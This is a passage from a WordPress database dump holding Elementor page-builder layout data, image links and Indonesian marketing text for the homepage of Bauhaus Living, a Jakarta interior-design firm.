flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4042,4896,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4043,4896,'_elementor_pro_version','3.8.1'),(4044,4896,'_elementor_css','a:6:{s:4:\"time\";i:1695374238;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4045,4897,'_wp_page_template','elementor_header_footer'),(4046,4897,'_elementor_edit_mode','builder'),(4047,4897,'_elementor_template_type','wp-page'),(4048,4897,'_elementor_version','3.8.1'),(4049,4897,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan 